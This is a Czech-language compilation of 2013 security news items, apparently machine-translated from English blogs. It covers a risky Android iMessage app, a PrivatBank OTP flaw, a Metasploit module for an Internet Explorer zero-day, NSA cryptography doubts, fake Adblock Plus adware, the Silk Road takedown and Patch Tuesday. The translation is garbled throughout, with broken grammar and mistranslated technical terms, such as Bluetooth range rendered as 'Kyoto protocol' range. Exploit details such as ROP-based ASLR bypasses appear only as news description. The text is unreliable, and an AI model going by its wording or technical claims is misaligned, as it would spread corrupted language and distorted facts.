zasílané prostřednictvím IMessage konverzaci dorazí beze změny, ale odesílatel osobní údaje byl vystaven kompromitaci v tomto procesu. Aby bylo možné přihlásit se na IMessage aplikaci pro chat, jsou Android uživatelé vyzváni k vytvoření (nebo použijte již existující) Apple ID, které budou použity k oklamat Apple servery do myšlení jejich zprávy v chatu pochází ze zařízení Apple. Dokonce i dva telefony Android mohli komunikovat přes app, ale oba by ještě třeba nejprve poskytnout Apple ID, což by zase vystavit jak pro uživatele, poté, co byla data odeslána prostřednictvím serveru v Číně. Mnoho Android uživatelé mohou používat Apple iTunes služby na jednom místě nebo jiný - a pokud jste zakoupili hudby nebo filmů prostřednictvím tohoto virtuálního obchodu, může být jejich kreditní karta vázána na jejich Apple ID. V tom spočívá riziko předání této citlivé přihlašovací údaje k neověřených třetí strany aplikace. Expozice něčí Apple ID a hesla související mohl dát hackerům přístup k uživatelskému osobních údajů, údaje o kreditní kartě, a možná dokonce i uložených iCloud dokumentů - v případě, že Apple ID předtím bylo spojeno s iPhone nebo Apple Computer. Dále bylo zjištěno, že iMessage Chat může být také manipulovat stáhnout a instalovat software na vašem telefonu v pozadí. App vývojáři, Daniel Zweigart a Luo Wangyi, reagovaly na diskusi o tom, že aplikace neobsahuje žádné malware , a oni by byli uvolnění aktualizovanou verzi vyžadující silnější oprávnění. Nicméně, je aplikace od té doby sejmut z obchodu Play Google Android. I když je již k dispozici ke stažení, a rizikem nyní odstraněn, tento incident vyvolává řadu otázek o tom, jak aplikace bez škodlivého záměru nelze, představují riziko pro uživatele z důvodu nevhodných (nebo laxní) oprávnění. Android byl zátah na všech aplikací v obchodě Google Play pozdní se zvýšeným předpisů a přísnější pokyny s cílem napomoci ochraně uživatelů před rizikovými ke stažení. A to poslední záznam ukazuje, proč tyto protokoly jsou nezbytné, když i zdánlivě neškodné a užitečné aplikace může ještě otevřít dveře k útokům na smartphonu nebo tabletu. Uživatelé mobilních zařízení představují rostoucí cíl pro hackery. Většina uživatelů jsou připojeni k jejich smartphonů po celý den, se spoléhat na nich libovolný počet činností od kontroly e-mailu na bankovnictví, hraní her na volání domů a všechno mezi tím. To znamená, že jsou neustále sdílení, stahování, nahrávání a prohlížení, z nichž každá by mohlo otevřít dveře do kybernetického útoku za špatných okolností. Zůstat v bezpečí na svém mobilním zařízení, neznamená, museli snížit zpět na své využití. Je to všechno o výkonu opatrnosti a informovanosti, pokud jde o přístup k informacím, které na vašem smartphone. Zde je několik tipů, které vám pomohou začít. Stáhněte si s extrémní předsudky. Jen proto, že app zní jako zábava, nebo vynikající pohodlí, neznamená, že je to bezpečné. Buďte opatrní, pokud jde o oprávnění jednotlivých aplikací, které jste stáhli na mobilních zařízeních, takže můžete i nadále využívat všechny své výhody a pohodlí. Začněte u zdroje. Ujistěte se, že aplikace pochází z důvěryhodného app obchodů, jako je Google Play, kde jsou programy prověřených týmem, který ví, na co se zaměřit v rizikových aplikací. Telefon uložíte může být váš vlastní. Nedávejte oprávnění všechny staré aplikace. Pokud aplikace požaduje pro lepší přístup, pak by měl potřebovat, mohlo by to být s těmito údaji a odesláním zpět do nepříliš poctivého developera. Nejoblíbenější aplikace, včetně zábavy a hry, aplikace by neměl přístup k datům v přístroji, jako jsou e-mailové hesel. Pravidelně měnit svá hesla. je to snadné stát se pohodlně s použitím stejné staré heslo znovu a znovu. Ale to prostě otevírá dveře k někomu dostat větší přístup k vaše cenná data, než byste chtěli. Buďte aktivní a pomoci zmařit zloději aktualizaci vašeho hesla pravidelně. Používejte silná hesla s více variantami, jako jsou velká písmena, číslice a speciální znaky, které je činí hůře praskat. Kromě toho nepoužívejte jména domácích mazlíčků nebo narozeniny nebo jiné položky veřejného záznamu jako heslo Chraňte své zařízení s kompletní zabezpečení. Dokonce s nejlepšími opatřeními, a nejbezpečnějších apps by hackeři ještě dostat do telefonu. Chraňte svou identitu a data přes všechny vaše zařízení (PC, Macy, chytré telefony a tablety) s McAfee LiveSafe ™ služby. Chraňte svou identitu a zařízení před škodlivým kódem, útoky typu phishing, viry, spam a další s tímto komplexním servisem. Jako aktivní uživatel smartphonu, je důležité být si vědom trendů v rozsáhlé počítačové trestné činnosti.
Je to vždy velký den, kdy se můžete podělit o něco tak inovativní, že to bude určitě změní hru v průmyslu. Dnes, v ohnisku McAfee 2013 konferenci, McAfee a můj tým oznámil vývoj a spuštění McAfee Threat Defense Advanced - nejnovější přírůstek do naší Security Connected portfolia. Pokud budete číst můj příspěvek s názvem " Rozvoj Ultimate Defense Advanced proti malwaru , "Dal jsem vám náhled na to, co lze očekávat v naději, že dráždil zájem a zvyšování povědomí, aniž rozdávání velké odhalení. Na McAfee, sledujeme hrozeb a pracovat na vývoji bezpečnostních řešení, která mohou pomoci organizacím udržet si náskok před předpokládaných hrozeb. McAfee Labs věří, že moderní malware nevykazuje žádné známky změny jeho stabilní růstovou trajektorii, která prudce vzrostla v průběhu posledních dvou čtvrtletích. Tyto hrozby jsou velmi nenápadný a navrženy tak, aby vyhnout detekci a pobývat na systému po delší dobu. Jako bezpečnostní profesionální, víte, že organizace již nemůže spoléhat na tradiční bezpečnostní řešení pro ochranu jejich digitální aktiva i proti tomuto kmeni malware. McAfee Threat Defense Advanced byl postaven na vzrušující technologie jsme získali od ValidEdge a kombinuje sandboxu s předními McAfee anti-malware motor, anti-virus technologie a globální pověst kanály vytvořit na trhu nejúplnější přístup k pokročilým detekce malwaru. Tato nová technologie identifikuje sofistikované, těžko detekují hrozby spuštěním podezření na malware v "sandbox", analyzovat jeho chování a vyhodnocuje potenciální dopady malware může mít na koncový bod a sítí. Lepší Přesnost detekce Rozšířené statická a dynamická analýza kódu společně poskytují co nejpodrobnější analýzu a údaje o malwaru klasifikaci Malware může být zabaleny nebo popletl se vyhnout odhalení. Silný vybalení umožňuje podrobnou analýzu a přesnou klasifikaci Široká podpora operačních systémů umožňuje hrozby, které mají být analyzovány za stejných podmínek jako skutečné vzkazy, čímž se snižuje šance na zmeškaný malware či falešných poplachů. Rychlejší doba odezvy Integrované řešení od McAfee rychle a hladce přejít z analýzy malwaru a odsouzení k ochraně a jejich řešení; komplexnější, účinnější přístup Down selection (směs podpisů, pověsti a real-time emulace) rychle identifikuje širokou škálu malware, vytvářet rychlý výsledky detekce a snížení počtu souborů, které vyžadují náročné na zdroje sandbox analysis Nižší náklady na vlastnictví Centralizované nasazení umožňuje více McAfee síťových zařízení mají stejné malware analýzy zařízení, čímž se sníží počet potřebných spotřebičů, zjednodušení administrativy a nákladově-efektivní škálování v rámci celé sítě Na rozdíl od většiny samostatný sandbox technologie McAfee Threat Defense Advanced nachází moderní malware a spolupracuje s ostatními řešeními McAfee na zmrazení hrozbu a opravit impaktovaných systémy. Najít. Freeze. Fix. Diskuse o inovace.
PRIVATBANK Mobile App ohrožená účtu krádeže
2.10.2013 Mobil | Hacking Privat24, mobilní bankovní aplikace pro největší ukrajinské komerční banky, obsahuje nedostatečné ověření zabezpečení v jejích aplikací iOS, Android a Windows Phone, které by mohly dát útočník schopnost ukrást peníze z uživatelských účtů po vynechání jeho dvoufaktorové autentizace ochranu.
Proces validace problém vzniká problém ve způsobu, jakým PRIVATBANK nakonfiguroval server, který zpracovává všechny jeho mobilního bankovnictví klientů. Na jeho webových stránkách a na Full Disclosure mailing listu , bezpečnostní výzkumník Eugene Dokukin vysvětluje, že tato chyba zabezpečení mu umožnilo obejít Privat24 je jednorázové heslo (OTP) mechanismus. Nicméně, Dokukin třeba napnout ve druhém útoku s cílem ohrozit bankovní aplikace úplně.
V ideálním případě by Private24 poslat OTP uživatelům pomocí standardní služby hlasových zpráv pokaždé, když on nebo ona přihlásí Nicméně, ve skutečnosti, že banka je pouze zaslání tohoto kódu uživatelům při prvotní instalaci aplikace na svém Android, iOS nebo Windows Mobile zařízení. Jakmile je aplikace nainstalována a ověřena původní OTP na konkrétní zařízení, může uživatel přístup k aplikaci bez překonání této bariéry vstupu znovu. Pro webové stránky PRIVATBANK na straně druhé, banka odešle nový OTP pokaždé, když se uživatel pokusí přihlásit
PRIVATBANK chrání účty svých uživatelů s jejich čísla mobilního telefonu - jako uživatelské jméno či číslem účtu - a heslem. Uživatelé tak budou muset své heslo pro přihlášení s nebo bez OTP. Dokukin útok proto je ošemetný. Útočník by druhý útok, případně s využitím malware nebo nějaké schéma, phishing, aby zjistil uživatelského účtu heslo, než budete moci ohrozit aplikace a potenciálně ukrást peníze.
Dokukin řekl, že kontaktoval PRIVATBANK a ohlásil zranitelnost vůči nim. Potvrdily problém na Dokukin, ale ještě to opravit. Výzkumník dosud vydal všechny technické detaily vysvětluje, jak tento útok funguje, ale říká, že má v úmyslu tak učinit, jakmile PRIVATBANK aktualizuje své aplikace se záplatou, kterým se stanoví chyba.
Threatpost natáhl PRIVATBANK stejně, ale společnost nereagovala na žádost o komentář v době zveřejnění.
Metasploit modul Vydáno pro IE Zero Day
2.10.2013 Zranitelnosti | Hacking | Bezpečnost Už je to 14 dnů od Microsoft vydal poradní a dočasné zmírnění pro zero-day zranitelnosti v aplikaci Internet Explorer , jeden je aktivně využíván ve volné přírodě a tzv. některými odborníky jako závažnou chybu prohlížeče, jak můžete mít.
Přesto uživatelé protože měl trochu více chránit před útoky těchto účinných než Fix It nástroj, vydané společností Microsoft 17. září. Mezitím využije již strženy řadu japonských médií stránky v útoku zalévání otvorů cílení vládních agentur a výrobců v Japonsku, a byly zapojeny do dalších útoků v Asii sahající dále než první myšlenka. Microsoft má ještě vydat out-of-band patch pro chybu, a Patch Tuesday týden pryč, to je stále více pravděpodobné, uživatelé budou i nadále vystaveny nejméně dalších sedm dní.
Tento přístup funguje, protože k dnešnímu dni známy útoky byly cílené a relativně malém měřítku. Včera však může věci byly urychleno vydáním modulu Metasploit exploitu pro CVE-2013-3893 . Pokud jste zastáncem zákona HD Mooreova , teorie navrhuje Josh Corman z Akamai, která zrcadlí Mooreova zákona výpočetní techniky v tomto neformálním útočník moc roste ve výši Metasploit, pak by se dalo očekávat, že uptick útoků, pomocí tohoto IE chyba.
Microsoft neodpověděl na žádost o komentář, ale minulý týden v reakci na útoky proti japonským médií stránky, Microsoft uvedl, že je i nadále pracovat na vývoji a testování aktualizace zabezpečení, a vyzval zákazníkům nainstalovat Fix It.
Metasploit inženýr Wei Chen napsal v blogpost , že zatímco exploit v současné době vidět v přírodě cílů IE 8 v systému Windows XP a IE 9 v systému Windows 7, je zranitelnost nalézt v IE celou cestu zpět k IE 6 a Metasploit modul by mohl být upraven tak, aby širší záběru cílů.
Microsoft píše ve svém zpravodaji , že vzdálené spuštění zranitelnost je use-po-free chyba v Microsoft vykreslování HTML motor v IE a exploit ve volné přírodě se provádí v javascriptu. To bylo také závislá na DLL Microsoft Office, který nebyl sestaven s rozložení adresového prostoru Náhodnost (ASLR) aktivován. Zneužití, proto obchází ASLR ochranu paměti tím, že spustitelný kód na známou adresu v paměti, Microsoft uvedl. Útočník by mohl využít hardcoded Return orientované programování řetěz označit stránky obsahující shell kódu jako spustitelný soubor.
Útočníci mohou nakazit oběti tím, že láká je na webové stránky hosting škodlivý javascript exploit, nebo špice on-line reklamy se exploitu.
Podle Chena, IE8 na XP verzi exploitu zaměřuje pouze anglické, čínské, japonské a korejské uživatele, na rozdíl od cílů Windows 7.
"Místo toho by exploit zkusit proti všem počítačích se systémem Windows 7 (IE8/IE9) tak dlouho, jak Office 2007 nebo Office 2010 je nainstalována," řekl. "To je proto, že Microsoft Office Nápověda Data Services Module (hxds.dll) mohou být načteny v IE, a je nutné, aby se využilo Return-orientovaného programování s cílem obejít DEP a ASLR a získat spuštění libovolného kódu."
Řada populárních japonských médií stránky byly ohroženy a byly hosting exploit javascript. IE uživatelé navštíví tyto stránky byly přesměrovány do lokalit verzi McRAT vzdáleného přístupu malware, vědci FireEye řekl na 23 září. Malware se používá k exfiltrate dat z počítače oběti a zprávy byly, že vládní úředníci a pracovníci v high-tech a výrobních organizací byla infikována.
FireEye v Darien Kindlund řekl Threatpost, že exploit javascript nejprve určit systém a prohlížeč detaily před podáváním do správné exploit. "V tomto případě, protože exploit pokrývá tolik verzí IE, útočníci nemusí nastavit předchůdce logiku, jako že v javascriptu. Mohou přinést stejný exploit (znovu a znovu) a mít jistotu, že to bude fungovat, "řekl.
FireEye řekl infikovaných počítačů připojit k velení a řízení serveru v Jižní Koreji přes port 443, zpětné provoz je nešifrované, přes jeho použití portu 443, FireEye a dodal, že druhý vzorek shromažďovány rovněž připojen ke stejné jihokorejské IP adresu . FireEye řekl, že také objevil hrst škodlivých domén Upozorňuje i na šetření v Jižní Koreji, který dovolil jim, aby připojení k útoku proti společnosti Bit9 zabezpečení v letošním roce. Stejný e-mailová adresa registrována jihokorejský serveru registrován i doménu použitý v útoku na bezpečnostní společnosti.
NSA Crypto Otázky napodobovat "Zrcadlový sál"
2.10.2013 Šifrování | Bezpečnost Je tu nebyla nouze o diskuse a debaty v posledních týden o možnosti, že NSA záměrně oslabil některé kryptografické algoritmy a šifer, aby bylo možné dát výhodu ve svých výzvědných operací. Pokud si předplatíte na nejhorší scénář linii myšlení, pak se většina běžně používaných šifer jsou ohroženy. Pokud jste optimističtější, pak mají tendenci si myslet, že možná NSA má některé soukromé schopnosti proti šifrovacích protokolů a jejich využívání. Nicméně, Jon Callas, spoluzakladatel Silent Circle, která oznámila v pondělí, že to byl odklon od potenciálně ohrožena šifer , řekl, že je to opravdu nezáleží na tom, zda NSA udělal to, protože škoda byla provedena.
"Tento problém, že máme co do činění se teď můžeme věřit něco z toho?" Callas řekl v rozhovoru. "Je to opravdu scvrkává, že jsem řekl, že jsem se snažil rozbít věci, tak to udělali to, nebo ne? Pokud se chystáte se na to podívat z realistického pohledu, je to opravdu nezáleží na tom, jestli to udělali. Je to, jak moc o NSA podkopávají důvěru. "
Silent Circle, poskytovatel bezpečných systémů zasílání zpráv, se rozhodl nahradit AES a SHA-2 ve svých produktech s Twofish a přadeno, resp. AES a SHA-2 jak byly součástí soutěže sponzorované Národním institutem pro normalizaci a technologie a nedávné odhalení ukázaly, že NSA mohou vyvíjel nějaký vliv na NIST standardy procesu v některých případech. Není známo, jaké protokoly může být poznamenána, a že nejistota je součástí toho, co řídil Silent Kruh rozhodnutí, stejně jako debata v bezpečnostní komunity o akce, aby se, pokud existuje.
Callas, cryptographer a bývalý zakladatel PGP Corp., řekl, že Silent Circle přemýšlel o tomto pohybu po dobu několika týdnů před oznámením a že technické provedení by nemělo být obtížné. Pro firmy, jako je Silent Circle, jehož zákazníci jsou závislé na bezpečnost a důvěrnost výrobků, otázka přijde k odstranění pochybnosti z mysli svých zákazníků. Ale pro zbytek internetové komunity, tam jsou jiné otázky, aby zvážila, jak se vztahuje k bezpečnosti některých eliptických křivek navržených NIST a NSA.
"Jde o to, že by se s největší pravděpodobností, av některých ohledech nejděsivější je to, co když v dobré víře, že NSA vytvořila tyto křivky v dobré víře a matematici tam našel problémy s nimi to slabší než kdokoli jiný myšlení, "Callas řekl. "Jsou věci, které jsme objevili o eliptických křivek v minulosti. Pokud NSA věděl, že tyto křivky byly slabší, že jsme si mysleli, záleží na tom?
"Obhajoba vždycky jsme měli v minulosti, je, že crypto NSA doporučené byl stejný materiál, který se používá k ochraně přísně tajné údaje, abychom mohli vždy říkají, No, oni by střílet se do nohy, taky? Nyní se ale zdá naprosto věrohodné se mi, že v případě, že strana intel domu našel něco, co jim dal výhodu oproti všem ostatním, oni by si to z druhé strany domu. Teď jsme opravdu zvědaví, jestli snad by střílet se do nohy na účel. "
Šifry, že Silent Circle plánuje používat ve svých výrobcích do budoucna jak byly navrženy nezávisle na sobě, něco, co Callas věří, bude důležité pro zákazníky společnosti do budoucna.
"Tam byly vždy lidé, kteří nejsou důvěryhodní standardní věci, a dokonce i NIST lidé by řekli, pokud nechcete věřit, jdeme-li používat tyto finalisty tady, které jsou duševním vlastnictvím zdarma," řekl. "To mě přemýšlet. Musíme najít cestu přes legitimní nedůvěru, která začíná podobat Zrcadlový sál ve špatném 1960 špionážního filmu.
Ad Plus místo Adblock Plus
2.10.2013 Hacking | Mobil
To je jeden z těch situacích, kdy uživatel hledá ochranu, ale najde jen ty problémy. Sergio de los Santos , můj přítel, který sdílí se mnou odkaz na falešnou aplikaci, která předstírá, že AdBlock Plus, známé a užitečné Aplikace, že mnozí uživatelé mají ve svých webových prohlížečích. V době jeho stažení, žádost byla aktivní v Google Play a všichni, kdo jej stáhli, místo App blokování non-požadované reklamy na svém webovém prohlížeči, dostal přesný opak-více reklamy a další problémy týkající se soukromí dat.
Říkám to proto, že na analýzu jeho kód, jeden mohl všimnout, že je ve skutečnosti adware. Kaspersky Anti-Virus detekuje jako HEUR: AdWare.AndroidOS.Starsys.b
Ale co přesně to škodlivý aplikace se po instalaci na oběti zařízení? Odpověď je, že dělá mnoho věcí, mezi nimiž jsou: android.permission.READ_LOGS (čte archivní protokoly přístroje, které obsahují citlivé osobní údaje uživatele) android.permission.BLUETOOTH (spolupracuje s bluetooth confirguration s kapacitou až měnit a povolit příchozí spojení s jinými zařízeními, která jsou v rámci Kjótského protokolu dosah) android.permission.INTERNET (poskytuje aplikace nezbytné pro přístup k Internetu) android.permission.RECEIVE_SMS (interaguje s SMS zprávami, čte a dokonce je smazat, aniž souhlas oběti) android.permission.READ_CONTACTS (má přístup ke všem kontaktům v programu) Adware je vydělávat přes RevMob https://www.revmobmobileadnetwork.com stejný RevMob stránka vysvětluje, jak to funguje: "jednoduchý a efektivní reklama jednotka vyzývá uživatele ke stažení zdarma app. Dostanete zaplaceno za kliknutí a instaluje. " Jedná se o použití tvůrci Adblock Plus mají pro tuto falešnou App. Naštěstí, v době psaní tohoto příspěvku, že škodlivý App již byly odstraněny.
FBI sundá miliardového Silk Road on Drug a Hacking Marketplac
2.10.2013 Hacking | Kriminalita FBI vzala dolů neslavný Silk Road podzemní trh s drogami, zatčení Ross William Ulbricht v San Franciscu včera a nabíjení ho nejen s distribucí nelegálních drog včetně heroinu a LSD, ale také s řadou trestných činů počítačových hackerů.
Ulbricht, který byl znám jako Dread Pirate Roberts, chlubil se v rozhovoru pro Forbes v srpnu, že ho nikdy chycen, ale to se rychle změnilo v polovině včera odpoledne, když FBI zatčen Ulbricht v San Francisco Public Library. Federální státní zástupce v New Yorku podal narkotiky, hacking a poplatky praní špinavých peněz proti Ulbricht, se uvádí, že od ledna 2011 běžel on-line platformu, kde četné obchodníci mohli rozprodávat drogy, kromě malware, jako jsou hesla zloděje, keyloggery a nástroje pro vzdálený přístup, Federální podání řekl.
Na webových stránkách Hedvábné stezky byly zabaveny FBI, společně s miliony dolarů v Bitcoiny, které byly jedinou měnou přijat na internetových stránkách.
Operačně, Hedvábná stezka byla přístupná pouze přes síť Tor, zvláštní agent FBI Christopher Tarbell napsal ve stížnosti podané proti Ulbricht. Anonymita v této síti stále transakce relativně bezpečný, Silk Road vygenerovala 1,2 miliardy dolarů tržeb, soud řekl papíry.
Podobat známé on-line tržiště, Hedvábná stezka nejen nabídl zákazníkům desítky tisíc výpisů pro regulované látky, ale inzerovaných stovky počítačových služeb hackerů. Četné výpisy nabízené služby pro nabourávání do sociálních médií účty, hackování bankomatů nebo spam a phishing seznamů.
"Jeden výpis byl pro" VELKÝM blackmarket seznamu kontaktů, "popsal jako seznam" připojí "k takové" služby "jako" Anonymní bankovních účtů, "" Counterfet Bills (CAD / GBP / EUR / USD) "," Střelné zbraně + Munice "," Stolen Info (CC, Paypal), "a" Hitmen (10 + zemí), "napsal Tarbell.
Dalších 800 výpisy jsou k dispozici také prodejní hacknutý Amazon a Netflix účty, hackerské nástroje a balené hackerské nástroje s kompletní keyloggery, krysy, bankovní trojské koně a další malware, Tarbell napsal.
Silk Road stránkách také inzeroval dostupnost kovaných řidičské průkazy, pasy, sociálního zabezpečení karet, nebo účty, výpisy kreditních karet, evidenci vozidel, pojištění a další dokumentaci, která by umožnila krádeže identity. Na stránkách také hostil wiki a komunitní fórum, kde kupující a prodávající mohou komunikovat, stejně jako pokyny pro provádění transakcí na místě a vyhnout se vymáhání práva, Tarbell v podání uvedl.
"V části fóra označené" Bezpečnost - Tor, Bitcoin, kryptografie, anonymita, bezpečnost atd., "tam jsou četné komentáře od uživatelů, které nabízejí poradenství pro ostatní uživatele o tom, jak by měl nastavit své počítače, aby nedošlo k zanechání stopy na svých systémech jejich činnosti na Hedvábné stezce, "Tarbell napsal.
Tajní agenti, Tarbell psal, byla provedena více než 100 transakcí na místě, nákup léků, hacking a další služby, od prodejců v 10 různých zemích, včetně USA
Soud dokument také řekl, že FBI se nachází několik serverů hosting operace Hedvábná stezka, včetně jednoho v jedné nejmenované zahraniční hostitelská země Silk Road stránky. Tarbell napsal, že FBI požádala obraz tohoto serveru 23. července a od uvedeného dne zjistil, že tam bylo více než 950 tisíc registrovaných uživatelů účty na serveru, a více než 1,2 milionu komunikace odesílané mezi Hedvábné stezky uživatelům na platformě v systému zasílání soukromých zpráv. Tarbell dodal, že v období od února 2011 do 23.července bylo 1,2 milionu transakcí uzavřených na místě s téměř 147.000 unikátních kupující účty a účty dodavatelů 3.877 unikátních výrobních zhruba 1200000000 dolarů (9,5 milionu Bitcoiny).
Soud dokument také poskytuje informace o činnosti Ulbricht je na platformě Silk Road, jak to vyřešit sporné otázky s uživateli, hrozeb z konkurentů, jak byly správci webu řízených a kompenzována, a podrobností o údajnou vraždu, k pronájmu.
Reuters mezitím oznámil, že zatčení došlo letos v Jižní Karolíně, v souvislosti s Hedvábné stezky; Eric Daniel Hughes, Hedvábná stezka zákazník působící pod pseudonymem Casey Jones, byl obviněn z držení drog. DEA také chytil Bitcoiny, které kdysi údajně nákupu léků na webu.
ochlazující účinek; o Kontrolním úřadu NSA Úniky
2.10.2013 Šifrování | Bezpečnost BERLIN -V tomto městě, jeden z největších světových metropolích, historie není nikdy daleko. To prostupuje každý aspekt každodenního života, a německý lid jsou velmi hrdí na hodně z té historie. Ale byly tam temné dny i zde, a není to tak dávno, kdy Stasi, východoněmecké tajné policie, který provozuje pronikavý dozor přístroj, který držel karty na miliony Němců jako samozřejmost. Telefonní hovory, denní pohyby a obchodní jednání byly sledovány, zdánlivě pro bezpečnost národa. Prostředí pak byl úplně jiný, samozřejmě, z atmosféry ve Spojených státech a dalších dnešní demokracie, ale účinky rozsáhlé sledování, zabezpečení výzkumník Andrew Lee tvrdí, zůstávají psychologicky zničující a vysilující pro většinu lidí.
Během vrcholící studené války, sledování přístroje ve východním Německu a dalších zemích byly rozsáhlé a všudypřítomné, ale mnoho lidí si byli vědomi, že jsou sledováni na nějaké úrovni. To, co nevěděl, bylo, jak všichni-zahrnovat shromažďování údajů bylo a jak tyto informace byly používány. Když nakonec ty detaily byly odhaleny, to mělo velký vliv.
"Všichni věděli, že někdo sledoval, ale oni nevěděli, do jaké míry," řekl Lee, výzkumník společnosti ESET v rozhovoru na konferenci Virus Bulletin 2013 zde ve středu. "Když zjistili, psychologický efekt byl zničující."
Kreslení srovnání s tím, co se děje v USA, Velké Británii a jinde v důsledku netěsností regarding NSA kontrolní metody a schopnosti v posledních měsících, Lee řekl, že vlády se staly hlavními soupeři pro mnoho organizací a dokonce i některé jednotlivé uživatele.
"Nejen, že vlády, jež zákony, ptají se na věci, jako je oslabení systémů a kryptografické backdoor," řekl. "Proč se dokonce požádat o přístup k systému, kdy stav zabezpečení koncových bodů v našem světě je dnes tak žalostně nedostatečný? Proč prostě rozbít koncový bod? A to je to, co se stalo. Vláda se dostává do malwaru podnikání. Další velká věc bude malware na mobilních zařízeních. "
Za účinku NSA úniky měli na cestě, že veřejnost vnímá vládu, tam také došlo k posunu v bezpečnostní komunity, pokud jde o způsob, jakým se její členové sdílejí informace a komunikovat s druhými. Hladiny důvěry mezi některými výzkumníky a společnosti, vybudované v průběhu let, byly sníženy v některých případech, Lee řekl, protože vědci nejsou jisti, kdo mohou věřit nyní a kteří by mohli být předávání informací zpravodajských a donucovacími orgány.
"Došlo k chlazení naší demokracie a vytvořil nedůvěru firem," řekl Lee. "Měli jsme dobré rozhovory [ve společnosti] před těmito úniky stalo. Teď nemluvíme o tom ještě. Jsme mimo mísu. "
Jednou z otázek, které se přicházejí často v diskusích v posledních měsících je to, zda jsou nějakým způsobem nutí vlády pro bezpečnost a antimalware společnosti, které nejsou k detekci malware a vlastní útok nástroje, které používáte ve svých operací. Lee řekl, že to nikdy nepřál odhalit vládní Trojan, a domnívá se, že tento přístup k ničemu jeden.
"Chcete-li hovořit o nucené odhalování, to je opravdu hloupý způsob, jak to udělat. Není to praktické, "řekl Lee. "Dělej, co všichni ostatní: Můžete napsat nějaký kód a předloží ji Virus Total a zjistit, kdo to dokáže detekovat."
K odhalení několika posledních měsíců vyvolaly nekonečné diskuse a mnoho jedu, ale Lee, pro jednoho, ptá se, jak užitečné to všechno bylo.
"Pochybuji o přiměřenost naší odpovědi na všechno," řekl. "Co je to návratnost naší utratit? Strávili jsme velmi málo, pokud vůbec něco, vzdělávání veřejnosti v této oblasti.
Udělejte si čas a vyjadřuje, jak Microsoft Patch Tuesday Ukázalo 10
2.10.2013 Zranitelnosti | Aktualizace andrew_stormsDne 09.10.2003 společnost Microsoft oznámila, že nový bezpečnostní opravou proces, který by skončil být katalyzátorem pro významnou změnu v komunitě informační bezpečnosti. Před deseti lety, program byl oznámen tiskové zprávy, které slibovalo
"Zlepšení procesů patch management, politik a technologií, které pomáhají zákazníkům zůstat až do dnešního dne a bezpečný." "Globální vzdělávací programy poskytnout lepší pokyny a nástroje pro zajištění systémů." V tiskové zprávě , generální ředitel společnosti Steve Ballmer řekl: "Náš cíl je jednoduchý: dostat naši zákazníci zajistit a udržet je v bezpečí. Naším cílem je chránit naše zákazníky před rostoucí vlně kriminálních útoků. "
Ti z nás pracuje v bezpečnostním průmyslu nebo firemní informační bezpečnosti odpovědnost viděl jako přímá reakce od známého Trustworthy Computing poznámky z pera Billa Gatese v lednu 2002. Známky byly jasné. Microsoft byl konfrontován s vážným dilematem. Jeho software byl prošpikovaný bezpečnostních děr, které byly, které mají přímý negativní dopad na bezpečnost svých zákazníků, dostupnosti a soukromí. V podnikové IT, Microsoft se rychle dostal svou vlastní přezdívku "nutné zlo." IT manažeři byli nuceni používat software společnosti Microsoft pro své obchodní funkce, ale to přišlo za cenu vážných bezpečnostních rizik.
Ať už jste líbí nebo pohrdání Microsoft, nové iniciativy v oblasti bezpečnosti začala před 10 lety vytvořil velkou vlnu změn v našem oboru informační bezpečnosti.
Pro začátek, Microsoft dokázal bezpečnostní komunity, že komunikace je klíčovým kamenem vztahy s dodavateli. Nikdo nemá rád přiznat, že mají bezpečnostní problémy. Microsoft vzal skok nejen přiznat, že měl problém, ale také zavazuje poskytovat průběžné komunikaci se svými zákazníky a na všech výpočetních uživatelům. Microsoft začal blogovat o bezpečnostních otázkách a také se pustil do závažných odchozích komunikačních kampaní zaměřených na informování uživatelů.
Microsoft ukázal, že komunikace a vztahy jsou obousměrné. Powerhouse nakonec začal ve věku, kdy to přijali stejnou komunitu lidí, kteří byli zodpovědné za vyhledávání a veřejně uvolňovat bezpečnostní díry v softwaru. V současné době zveřejnění závažných bezpečnostních děr Microsoft je nyní výjimkou.
Také plánování zdrojů je tabulka podíly v podniku IT svět. Být nákladové středisko moc nepomůže, ale má tradičně nedostatečně a nedoceněný. Co je podnikové IT nebo bezpečnostní manažer dělat, když jejich primární prameny dodavatele softwaru na nich kritické opravy zabezpečení pomocí do-or-die následky? Historicky, a tak i dnes, mnoho z probíhajících projektů se snížil na rychle přerozdělit zdroje do okamžiku kritické opravy zabezpečení. Život ve světě neustálého přerušení poškozuje morálku dokončení všech plánovaných projektů.
Pomocí nového Microsoft konzistentní načasování verzi záplaty, podnikové IT může záviset na plánu a alokovat zdroje odpovídajícím způsobem. Měsíční cyklus záplatování brzy stal se lépe známý jako Patch Tuesday. Později v roce splatnosti modelu Microsoftu, bylo by to zavést moderní oznamovací službu. Víme, že dnes ve čtvrtek před Patch Tuesday, kdy jsme obdrželi vysoké úrovni úryvek o tom, co očekávat příští týden.
Microsoft také ukázal hodnotu konzistence jinými způsoby. Například Microsoft vzal brzy odvážný krok definovat své hodnocení bezpečnostnímu významu a dělal definice veřejnosti. Dokonce i Microsoft bulletinu zabezpečení textový formát a úseky byly dodány v jednotném formátu, který odborníci na bezpečnost si zvykli spoléhat. Bezpečnost lidí, jako je opakovatelné a spolehlivé systémy. Microsoft vydal právě to.
Třikrát hurá na Patch Tuesday. Je to každé druhé úterý v měsíci, že jsme oba láska a nenávist. Před deseti lety, Patch Tuesday iniciativy vytvořil hluboký přínos pro všechny společnosti, spotřebitele tím, že je snazší udržet systémy skvrny a bezpečnější. V té době, myšlenka se zdálo tak cizí, ale od té doby získal tolik po jiných výrobců, jako je Cisco, Adobe a Oracle následovaly. Strávit jen pět minut dnes a zvážit, kde budeš dnes bez Microsoft přičemž skok před 10 lety.
Vědci Zamysli Kdy Informujte uživatele veřejných zneužitím slabých
2.10.2013 Zranitelnosti | Bezpečnost BERLIN -Just šeptat slova "zranitelnosti zveřejnění" na doslech bezpečnostní výzkumník nebo dodavatele bezpečnostních členů Response Team vám může pomoci ve strachu o svůj život v těchto dnech. Debata je tak staré a opotřebované, že není prakticky nic nového co říct, nebo žvýkat v tomto bodě. Nicméně otázka toho, kdy se odhalí, že daná chyba zabezpečení je využívána ve volné přírodě je zcela jiná.
